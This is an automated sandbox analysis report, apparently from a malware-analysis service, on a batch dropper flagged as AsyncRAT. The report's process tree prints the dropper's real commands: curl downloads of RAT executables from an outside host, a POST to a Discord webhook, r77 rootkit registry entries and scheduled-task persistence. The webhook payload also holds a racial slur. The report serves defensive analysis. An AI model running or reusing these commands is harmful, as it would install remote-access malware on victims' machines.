asyncrat | 9ef018c8c1dfaf529ee32c2a9a60b4c93d053d0691e6a874c58c3e43347d3861

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
17-06-2024 21:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dropper_1.bat
Size

4KB
MD5

ab9f827127346feb12cbe8d2329ba798
SHA1

70f504600f0452121b04f3f82e76b22c9d085c35
SHA256

9ef018c8c1dfaf529ee32c2a9a60b4c93d053d0691e6a874c58c3e43347d3861
SHA512

16af3002cda0e2861f2ba89bb69f97aaf3ed5b1fdcfdf67a9318e48079ac17d97902744359d4d55513b6c21c06fc85b6d09047a98677f86f2655782b0d23e438
SSDEEP

48:61jKP/WlIqQ9+iCObFg/7gGcK+hrZaw0JUrSXYSlDI6p8536anO6jiF6ydr6okSY:ZP/HVbxawsUrCczjig

Score

10^/10

asyncrat persistence rat

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4856 created 604 4856 powershell.EXE winlogon.exe

description	pid	process	target process
PID 4856 created 604	4856	powershell.EXE	winlogon.exe

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Windows\Resources\$77-scchost.exe	family_asyncrat

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

$77-sdchost.exe$77-penisware.exe$77-scchost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	$77-sdchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	$77-penisware.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	$77-scchost.exe

Executes dropped EXE 10 IoCs

Processes:

$77-sdchost.exe$77-scchost.exe$77-penisware.exe$77-penisware2.exe$77-install.exe$77-penisware2.exe$77-scchost.exe$77-penisware.exe$77-scchost.exe$77-penisware.exe

pid	process
4268	$77-sdchost.exe
4020	$77-scchost.exe
1212	$77-penisware.exe
2492	$77-penisware2.exe
3092	$77-install.exe
2184	$77-penisware2.exe
4056	$77-scchost.exe
1180	$77-penisware.exe
1656	$77-scchost.exe
5760	$77-penisware.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

$77-sdchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe"	$77-sdchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

4 discord.com
5 discord.com

flow	ioc
4	discord.com
5	discord.com

Drops file in System32 directory 3 IoCs

Processes:

powershell.EXE$77-penisware2.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf	$77-penisware2.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4856 set thread context of 220 4856 powershell.EXE dllhost.exe

description	pid	process	target process
PID 4856 set thread context of 220	4856	powershell.EXE	dllhost.exe

Drops file in Windows directory 5 IoCs

Processes:

curl.execurl.execurl.execurl.execurl.exe

description	ioc	process
File created	C:\Windows\Resources\$77-sdchost.exe	curl.exe
File created	C:\Windows\Resources\$77-scchost.exe	curl.exe
File created	C:\Windows\Resources\$77-penisware.exe	curl.exe
File created	C:\Windows\Resources\$77-penisware2.exe	curl.exe
File created	C:\Windows\Resources\$77-install.exe	curl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1676 schtasks.exe
4500 schtasks.exe
4992 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

744 timeout.exe
972 timeout.exe

pid	process
1676	schtasks.exe
4500	schtasks.exe
4992	schtasks.exe

pid	process
744	timeout.exe
972	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 48 IoCs

Processes:

powershell.EXEdllhost.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	dllhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133631333142223269"	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	dllhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE

Modifies registry class 2 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{4E6B2584-18D6-46D1-966C-53E502273C22}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{962D9999-CA7C-49E7-A38D-7C858997F3DB}	msedge.exe

Runs regedit.exe 1 IoCs

Processes:

regedit.exe

pid process

4084 regedit.exe

pid	process
4084	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

$77-penisware2.exe$77-scchost.exepowershell.EXE$77-penisware2.exe

pid	process
2492	$77-penisware2.exe
2492	$77-penisware2.exe
2492	$77-penisware2.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4020	$77-scchost.exe
4856	powershell.EXE
4856	powershell.EXE
4856	powershell.EXE
4856	powershell.EXE
2492	$77-penisware2.exe
2492	$77-penisware2.exe
2492	$77-penisware2.exe
2492	$77-penisware2.exe
2492	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2184	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe
2184	$77-penisware2.exe
2492	$77-penisware2.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

regedit.exe

pid process

4084 regedit.exe

pid	process
4084	regedit.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

$77-penisware2.exe$77-scchost.exepowershell.EXE$77-sdchost.exe$77-penisware.exe$77-penisware2.exe$77-scchost.exe$77-penisware.exe$77-scchost.exe$77-penisware.exe

description	pid	process
Token: SeDebugPrivilege	2492	$77-penisware2.exe
Token: SeDebugPrivilege	4020	$77-scchost.exe
Token: SeDebugPrivilege	4020	$77-scchost.exe
Token: SeDebugPrivilege	4856	powershell.EXE
Token: SeDebugPrivilege	4856	powershell.EXE
Token: SeDebugPrivilege	4268	$77-sdchost.exe
Token: SeDebugPrivilege	1212	$77-penisware.exe
Token: SeDebugPrivilege	2184	$77-penisware2.exe
Token: SeDebugPrivilege	4268	$77-sdchost.exe
Token: SeDebugPrivilege	1212	$77-penisware.exe
Token: SeDebugPrivilege	4056	$77-scchost.exe
Token: SeDebugPrivilege	1180	$77-penisware.exe
Token: SeDebugPrivilege	1656	$77-scchost.exe
Token: SeDebugPrivilege	5760	$77-penisware.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

helppane.exe

pid process

3228 helppane.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

$77-penisware2.exe$77-penisware2.exehelppane.exe

pid process

2492 $77-penisware2.exe
2184 $77-penisware2.exe
3228 helppane.exe
3228 helppane.exe

pid	process
3228	helppane.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3548 wrote to memory of 376	3548	cmd.exe	chcp.com
PID 3548 wrote to memory of 376	3548	cmd.exe	chcp.com
PID 3548 wrote to memory of 4020	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 4020	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 3260	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 3260	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 4620	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 4620	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 1812	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 1812	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 2680	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 2680	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 2612	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 2612	3548	cmd.exe	curl.exe
PID 3548 wrote to memory of 3556	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 3556	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 4324	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 4324	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 4960	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 4960	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 3412	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 3412	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 5108	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 5108	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 1960	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 1960	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 3192	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 3192	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 1152	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 1152	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 4220	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 4220	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 920	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 920	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 1992	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 1992	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 1732	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 1732	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 2452	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 2452	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 4752	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 4752	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 3508	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 3508	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 2604	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 2604	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 3944	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 3944	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 1316	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 1316	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 4320	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 4320	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 4360	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 4360	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 4352	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 4352	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 5052	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 5052	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 376	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 376	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 5032	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 5032	3548	cmd.exe	reg.exe
PID 3548 wrote to memory of 860	3548	cmd.exe	cmd.exe
PID 3548 wrote to memory of 860	3548	cmd.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:604

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2bce0d73-0c0e-4c8d-afff-048466bba782}
2⤵
- Modifies data under HKEY_USERS
PID:220

C:\Windows\Resources\$77-penisware2.exe
"C:\Windows\Resources\$77-penisware2.exe"
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dropper_1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3548

C:\Windows\system32\chcp.com
chcp 65001
2⤵
PID:376

C:\Windows\system32\curl.exe
C:\Windows\system32\curl "https://discord.com/api/webhooks/1250147812503584798/kM-golxLeBjZkcQMdjxFBJ8cEzMjI9zUI-ekNo5GaP0xIAPrgIM71FdqGQFE9zwSksRt" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone"",""embeds"":[{""title"":""Loader Was Ran By Admin!"",""color"":16711680,""author"":{""name"":""Sexy Niggas""},""footer"":{""text"":""UD Loader - Mon 06/17/2024 21:27:15.44""}}],""username"":""UD Loader"",""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
2⤵
PID:4020

C:\Windows\system32\curl.exe
C:\Windows\system32\curl "https://penisware.com/r77/Install.exe" --output "C:\Windows\Resources\$77-install.exe"
2⤵
- Drops file in Windows directory
PID:3260

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/xworm/sdchost.exe --output C:\Windows\Resources\$77-sdchost.exe
2⤵
- Drops file in Windows directory
PID:4620

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/venom/scchost.exe --output C:\Windows\Resources\$77-scchost.exe
2⤵
- Drops file in Windows directory
PID:1812

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/xworm/penisware-gold.exe --output C:\Windows\Resources\$77-penisware.exe
2⤵
- Drops file in Windows directory
PID:2680

C:\Windows\system32\curl.exe
C:\Windows\system32\curl https://penisware.com/venom/penisware2.exe --output C:\Windows\Resources\$77-penisware2.exe
2⤵
- Drops file in Windows directory
PID:2612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:3556

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-sdchost.exe
2⤵
PID:4324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:4960

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-sdchost.exe
2⤵
PID:3412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:5108

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-sdchost.exe
2⤵
PID:1960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:3192

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-scchost.exe
2⤵
PID:1152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:4220

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-scchost.exe
2⤵
PID:920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:1992

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-scchost.exe
2⤵
PID:1732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:2452

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware.exe
2⤵
PID:4752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:3508

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware.exe
2⤵
PID:2604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:3944

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware.exe
2⤵
PID:1316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:4320

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware2.exe
2⤵
PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:4352

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware2.exe
2⤵
PID:5052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:376

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware2.exe
2⤵
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:860

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-install.exe
2⤵
PID:4660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y "
2⤵
PID:2328

C:\Windows\system32\reg.exe
C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-install.exe
2⤵
PID:1656

C:\Windows\Resources\$77-sdchost.exe
"C:\Windows\Resources\$77-sdchost.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4268

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
3⤵
- Creates scheduled task(s)
PID:4992

C:\Windows\Resources\$77-scchost.exe
"C:\Windows\Resources\$77-scchost.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"' & exit
3⤵
PID:3412

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"'
4⤵
- Creates scheduled task(s)
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp829.tmp.bat""
3⤵
PID:1960

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:972

C:\Windows\Resources\$77-penisware.exe
"C:\Windows\Resources\$77-penisware.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1212

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-penisware" /tr "C:\Users\Admin\AppData\Roaming\$77-penisware.exe"
3⤵
- Creates scheduled task(s)
PID:1676

C:\Windows\Resources\$77-penisware2.exe
"C:\Windows\Resources\$77-penisware2.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2492

C:\Windows\system32\timeout.exe
timeout 2
2⤵
- Delays execution with timeout.exe
PID:744

C:\Windows\Resources\$77-install.exe
"C:\Windows\Resources\$77-install.exe"
2⤵
- Executes dropped EXE
PID:3092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3764,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=3800 /prefetch:8
1⤵
PID:3732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
